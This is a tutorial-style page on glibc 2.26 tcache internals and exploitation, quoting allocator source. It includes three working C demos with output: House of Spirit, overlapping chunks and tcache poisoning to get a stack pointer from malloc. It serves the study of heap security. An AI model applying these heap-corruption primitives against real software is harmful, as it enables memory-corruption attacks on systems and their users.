# TCACHE exploitation ## Overview * **libc-2.26** ### TL;DR * Chunks can end up in the thread caches multiple ways * upon `free` * before the fastbin code in `_int_free`, if the chunk has an appropriate size and the corresponding bin isn’t full. * upon `malloc` * if a fast/small chunk is returned, the other chunks from the corresponding bin are used to fill the appropriate tcache bin. * in the binning code, exact size matches are first put in the tcache instead of returning immediately. * Chunks are taken from the tcache * in `__libc_malloc`, before `_int_malloc` * after the binning code, if at least one exact match was found. * there can also be a limit on the number chunks that are put in the tcache in a run of the binning code. If that’s reached, the last one found is returned. However, this is unlimited by default. * Some observations * the tcache fill code in the fast path of malloc will reverse the order of the chunks. * **cached chunks won’t be coalesced** neither on free of neighboring chunks nor with top when they are freed. ### data structure ```C /* We overlay this structure on the user-data portion of a chunk when the chunk is stored in the per-thread cache. */ typedef struct tcache_entry { struct tcache_entry *next; } tcache_entry; /* There is one of these for each thread, which contains the per-thread cache (hence "tcache_perthread_struct"). Keeping overall size low is mildly important. Note that COUNTS and ENTRIES are redundant (we could have just counted the linked list each time), this is for performance reasons. */ typedef struct tcache_perthread_struct { char counts[TCACHE_MAX_BINS]; tcache_entry *entries[TCACHE_MAX_BINS]; } tcache_perthread_struct; static __thread char tcache_shutting_down = 0; static __thread tcache_perthread_struct *tcache = NULL; ``` * similart to fast-bin * single linked-list * FIFO * ```C # define TCACHE_FILL_COUNT 7 # define TCACHE_MAX_BINS 64 ``` * There are 64 singly-linked bins per thread by default * **chunksizes from 24 to 1032** (12 to 516 on x86) bytes, in 16 (8) byte increments. * A single tcache bin contains at most **7 chunks** by default. ### operation ```C /* Caller must ensure that we know tc_idx is valid and there's room for more chunks. */ static void tcache_put (mchunkptr chunk, size_t tc_idx) { tcache_entry *e = (tcache_entry *) chunk2mem (chunk); assert (tc_idx < TCACHE_MAX_BINS); e->next = tcache->entries[tc_idx]; tcache->entries[tc_idx] = e; ++(tcache->counts[tc_idx]); } /* Caller must ensure that we know tc_idx is valid and there's available chunks to remove. */ static void * tcache_get (size_t tc_idx) { tcache_entry *e = tcache->entries[tc_idx]; assert (tc_idx < TCACHE_MAX_BINS); assert (tcache->entries[tc_idx] > 0); tcache->entries[tc_idx] = e->next; --(tcache->counts[tc_idx]); return (void *) e; } ``` ### workflow * **__libc_malloc** ```C void * __libc_malloc (size_t bytes) { ... #if USE_TCACHE /* int_free also calls request2size, be careful to not pad twice. */ size_t tbytes = request2size (bytes); size_t tc_idx = csize2tidx (tbytes); MAYBE_INIT_TCACHE (); DIAG_PUSH_NEEDS_COMMENT; if (tc_idx < mp_.tcache_bins /*&& tc_idx < TCACHE_MAX_BINS*/ /* to appease gcc */ && tcache && tcache->entries[tc_idx] != NULL) { return tcache_get (tc_idx); } DIAG_POP_NEEDS_COMMENT; #endif ... victim = _int_malloc (ar_ptr, bytes); ``` * take from tcache first **before** `_int_malloc` if there is a suitable chunk. * **_int_malloc** ```C static void * _int_malloc (mstate av, size_t bytes) { ... #if USE_TCACHE size_t tcache_unsorted_count; /* count of unsorted chunks processed */ #endif ... // fast #if USE_TCACHE /* While we're here, if we see other chunks of the same size, stash them in the tcache. */ size_t tc_idx = csize2tidx (nb); if (tcache && tc_idx < mp_.tcache_bins) { mchunkptr tc_victim; /* While bin not empty and tcache not full, copy chunks over. */ while (tcache->counts[tc_idx] < mp_.tcache_count && (pp = *fb) != NULL) { REMOVE_FB (fb, tc_victim, pp); if (tc_victim != 0) { tcache_put (tc_victim, tc_idx); } } } #endif ... // small #if USE_TCACHE /* While we're here, if we see other chunks of the same size, stash them in the tcache. */ size_t tc_idx = csize2tidx (nb); if (tcache && tc_idx < mp_.tcache_bins) { mchunkptr tc_victim; /* While bin not empty and tcache not full, copy chunks over. */ while (tcache->counts[tc_idx] < mp_.tcache_count && (tc_victim = last (bin)) != bin) { if (tc_victim != 0) { bck = tc_victim->bk; set_inuse_bit_at_offset (tc_victim, nb); if (av != &main_arena) set_non_main_arena (tc_victim); bin->bk = bck; bck->fd = bin; tcache_put (tc_victim, tc_idx); } } } #endif ... #if USE_TCACHE INTERNAL_SIZE_T tcache_nb = 0; size_t tc_idx = csize2tidx (nb); if (tcache && tc_idx < mp_.tcache_bins) tcache_nb = nb; int return_cached = 0; tcache_unsorted_count = 0; #endif ... #if USE_TCACHE /* Fill cache first, return to user only if cache fills. We may return one of these chunks later. */ if (tcache_nb && tcache->counts[tc_idx] < mp_.tcache_count) { tcache_put (victim, tc_idx); return_cached = 1; continue; } else { #endif ... #if USE_TCACHE /* If we've processed as many chunks as we're allowed while filling the cache, return one of the cached ones. */ ++tcache_unsorted_count; if (return_cached && mp_.tcache_unsorted_limit > 0 && tcache_unsorted_count > mp_.tcache_unsorted_limit) { return tcache_get (tc_idx); } #endif ... #if USE_TCACHE /* If all the small chunks we found ended up cached, return one now. */ if (return_cached) { return tcache_get (tc_idx); } #endif ``` * After retrieving a chunk from fastbin, the allocator will remove all chunks in the fastbin of current requested size and move them into the TCache list. * **_init_free** ```C static void _int_free (mstate av, mchunkptr p, int have_lock) { ... #if USE_TCACHE { size_t tc_idx = csize2tidx (size); if (tcache && tc_idx < mp_.tcache_bins && tcache->counts[tc_idx] < mp_.tcache_count) { tcache_put (p, tc_idx); return; } } #endif ``` ## TCACHE Exploitation * Performance : **most of the free/malloc code is bypassed for non-large chunksizes** until the corresponding tcache bins are full ### The House of Spirit * powerful * **no nextsize check** * now **it works for smallbin** sizes, too * demo ```C #include <stddef.h> #include <stdio.h> #include <stdlib.h> #include <stdint.h> #include <string.h> typedef size\_t INTERNAL\_SIZE_T; struct malloc_chunk { INTERNAL\_SIZE\_T prev_size; /* Size of previous chunk (if free). */ INTERNAL\_SIZE\_T size; /* Size in bytes, including overhead. */ struct malloc_chunk* fd; /* double links -- used only if free. */ struct malloc_chunk* bk; /\* Only used for large blocks: pointer to next larger size. */ struct malloc\_chunk* fd\_nextsize; /* double links -- used only if free. */ struct malloc\_chunk* bk\_nextsize; }; typedef struct malloc_chunk* mchunkptr; int main(int argc, const char* argv\[\]) { size\_t fake\_chunk\_and\_more\[64\]; printf("This example showcases how the House of Spirit became more powerful " \ " after the tcache patch\\n"); printf("Filling space at and after the fake chunk with invalid data\\n"); memset(fake\_chunk\_and\_more, 'A', sizeof(fake\_chunk\_and\_more)); printf("Building fake chunk on the stack at %p\\n", (void *)fake\_chunk\_and_more); mchunkptr fake\_chunk = (mchunkptr)(void *)fake\_chunk\_and\_more; fake_chunk->size = 0x110; void \*mem = (void\*)((char*)fake\_chunk + offsetof(struct malloc\_chunk, fd)); free(mem); printf("Passed chunk to free, let's make an allocation for the fake size\\n"); void *mem2 = malloc(0x100); printf("malloc(0x100) returned: %p\\n", mem2); return 0; } ``` > fanzine/05-tcache/tcache_house_of_spirit > This example showcases how the House of Spirit became more powerful after the tcache patch > Filling space at and after the fake chunk with invalid data > Building fake chunk on the stack at 0x7fff781b50e0 > Passed chunk to free, let's make an allocation for the fake size > malloc(0x100) returned: 0x7fff781b50f0 ### Overlapping chunks * demo ```C #include <stddef.h> #include <stdio.h> #include <stdlib.h> #include <stdint.h> size_t \*chunksizep(void \*mem) { return (size\_t *)(((char *)mem) - sizeof(size\_t)); } int main(int argc, const char* argv\[\]) { printf("This example showcases the possiblity to create overlapping chunks \ via the tcaching code in \_int\_free\\n"); void *mem = malloc(0x48); void *sentry = malloc(0x18); printf("Allocated victim chunk with requested size 0x48 at %p\\n", mem); printf("Allocated sentry element after victim (not strictly necessary): %p\\n", sentry); printf("Emulating corruption of the victim's size to 0x110\\n"); *chunksizep(mem) = 0x110; free(mem); printf("Freed victim chunk to put it in a different tcache bin\\n"); void *mem2 = malloc(0x100); printf("Requested a chunk of 0x100 bytes, it is at: %p\\n", mem2); return 0; } ``` > fanzine/05-tcache/overlapping_chunks_by_caching > This example showcases the possibility to create overlapping chunks via the tcaching code in _int_free > Allocated victim chunk with requested size 0x48 at 0x560e374c4670 > Allocated sentry element after victim (not strictly necessary): 0x560e374c46c0 > Emulating corruption of the victim's size to 0x110 > Freed victim chunk to put it in a different tcache bin > Requested a chunk of 0x100 bytes, it is at: 0x560e374c4670 ### TCACHE poisoning * similar to fastbin attack, but more powerful * While taking away from bin, **no size check corresponding `fastbin_index` need to be satisfied.** * **no double free check against the first member of the bin upon free** * demo ```C #include <malloc.h> #include <stddef.h> #include <stdio.h> #include <stdlib.h> #include <stdint.h> typedef struct tcache_entry { struct tcache_entry *next; } tcache_entry; size_t \*chunksizep(void \*mem) { return (size\_t *)(((char *)mem) - sizeof(size\_t)); } int main(int argc, const char* argv\[\]) { size_t target\[6\]; printf("This example showcases tcache poisoning by forcing malloc to " \ "return an arbitrary chunk after the corruption of a tcache_entry\\n"); printf("Our target is a stack region at %p\\n", (void *)target); void *mem = malloc(0x48); tcache\_entry \*victim = (tcache\_entry \*)mem; printf("Allocated victim chunk with requested size 0x48 at %p\\n", mem); free(mem); printf("Freed victim chunk to put it in a tcache bin\\n"); printf("Emulating corruption of the next ptr of victim (while also " \ "corrupting its size for good measure)\\n"); *chunksizep(mem) = 0x41414141; victim->next = (void *)target; printf("Now we need to make two requests for the appropriate size " \ "so that malloc returns a chunk overlapping our target\\n"); void *mem1 = malloc(0x48); void *mem2 = malloc(0x48); printf("The first malloc(0x48) returned %p, the second one: %p\\n", mem1, mem2); return 0; } ``` > fanzine/05-tcache/tcache_poisoning > This example showcases tcache poisoning by forcing malloc to return an arbitrary chunk after the corruption of a tcache_entry > Our target is a stack region at 0x7fff0faa62c0 > Allocated victim chunk with requested size 0x48 at 0x55f6a8fb9670 > Freed victim chunk to put it in a tcache bin > Emulating corruption of the next ptr of victim (while also corrupting its size for good measure) > Now we need to make two requests for the appropriate size so that malloc returns a chunk overlapping our target > The first malloc(0x48) returned 0x55f6a8fb9670, the second one: 0x7fff0faa62c0 ## ref [Extra Heap Exploitation 2: TCache and Potential Exploitation](https://dangokyo.me/2018/01/16/extra-heap-exploitation-tcache-and-potential-exploitation/) [ptmalloc fanzine - episode 05: thread local caching in glibc malloc](http://tukan.farm/2017/07/08/tcache/)